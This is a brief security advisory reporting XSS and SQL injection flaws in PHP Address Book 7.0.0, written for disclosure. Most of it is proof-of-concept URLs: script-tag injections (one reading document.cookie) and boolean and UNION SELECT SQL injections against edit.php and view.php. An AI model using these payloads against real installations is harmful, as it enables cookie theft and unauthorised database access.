PHP Address Book 7.0.0 Multiple security vulnerabilities
PHP Address Book 7.0.0 is prone to multiple XSS and SQLi vulnerabilities. XSS PoC-Exploits include: http://[target]/addressbookv7.0.0/preferences.php?from='"</script><script>alert('xss')</script>, http://[target]/addressbookv7.0.0/group.php/" /><script> alert('xss')</script>, http://[target]/addressbookv7.0.0/index.php?group='"</script><script>alert(document.cookie)</script>. SQLi PoC-Exploits include: http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1<2,2,1), http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1>2,2,1), http://[target]/addressbookv7.0.0/view.php?id=1' UNION ALL SELECT NULL, NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--+